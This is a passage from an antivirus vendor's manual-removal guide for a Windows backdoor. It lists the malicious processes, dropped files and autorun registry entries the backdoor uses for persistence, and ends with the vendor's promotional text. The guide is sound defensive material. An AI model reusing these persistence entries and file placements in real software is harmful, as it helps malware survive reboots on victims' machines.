  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    4IR.exe:612
    sc.exe:1304
    sc.exe:492
    1EuroP.exe:1524
    2gansta.exe:1532
    net1.exe:584
    net1.exe:1604
    3IC.exe:1112
    net.exe:304
    net.exe:2032
    rundll32.exe:340
    runonce.exe:396
    %original file name%.exe:556
    Rundll32.exe:132
    grpconv.exe:1484
    5tbp.exe:1264

  3. Delete the original Backdoor file.
  4. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Application Data\mdinstall.inf (426 bytes)
    %Documents and Settings%\%current user%\Application Data\MouseDriver.bat (103 bytes)
    %Documents and Settings%\%current user%\Application Data\0s70t3ayy.bat (142 bytes)
    %Documents and Settings%\%current user%\Application Data\lnhz9.exe (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Scv..bat (168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (11920 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\2gansta.exe (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5tbp.exe (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\3IC.exe (6584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\1EuroP.exe (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\4IR.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\cb.exe (3 bytes)
    %WinDir%\msdnih.dll (118 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "ez88" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Ihoragiqinicim" = "rundll32.exe %WinDir%\msdnih.dll,Startup"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "GrpConv" = "grpconv -o"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now